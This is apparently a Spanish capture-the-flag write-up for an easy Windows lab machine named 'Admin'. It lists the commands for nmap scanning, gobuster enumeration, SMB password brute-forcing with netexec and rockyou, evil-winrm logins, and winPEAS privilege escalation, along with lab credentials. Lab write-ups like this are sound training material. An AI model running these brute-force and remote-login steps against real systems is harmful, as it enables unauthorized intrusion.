Admin
🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.58
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.58 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 80, 135, 139, 445, 5040, 5985, 47001 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de HTTP, Microsoft RPC, NetBIOS-SSN, Microsoft-DS, WinRM y otros puertos desconocidos, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80,135,139,445,5985,47001 -v 192.168.1.58
para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80.

Revisamos directorios.
gobuster dir -u http://192.168.1.58 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Encontramos interesante /tasks.txt. Miramos el contenido.

🚀 EXPLOTACIÓN
Encontramos hope como posible usuario. Realizamos fuerza bruta.
netexec smb 192.168.1.58 -u 'hope' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

Nos conectamos al sistema con evil-winrm.
evil-winrm -i 192.168.1.58 -u "hope" -p "loser"

🔐 PRIVILEGIOS
Subo winPEAS para una búsqueda a fondo para escalar privilegios.

Ejecutamos. Encontramos un archivo con la contraseña y usuario.

Nos conectamos con evil-winrm. Ya somos root.
evil-winrm -i 192.168.1.58 -u 'administrator' -p 'SuperAdministrator123'

Last updated
Was this helpful?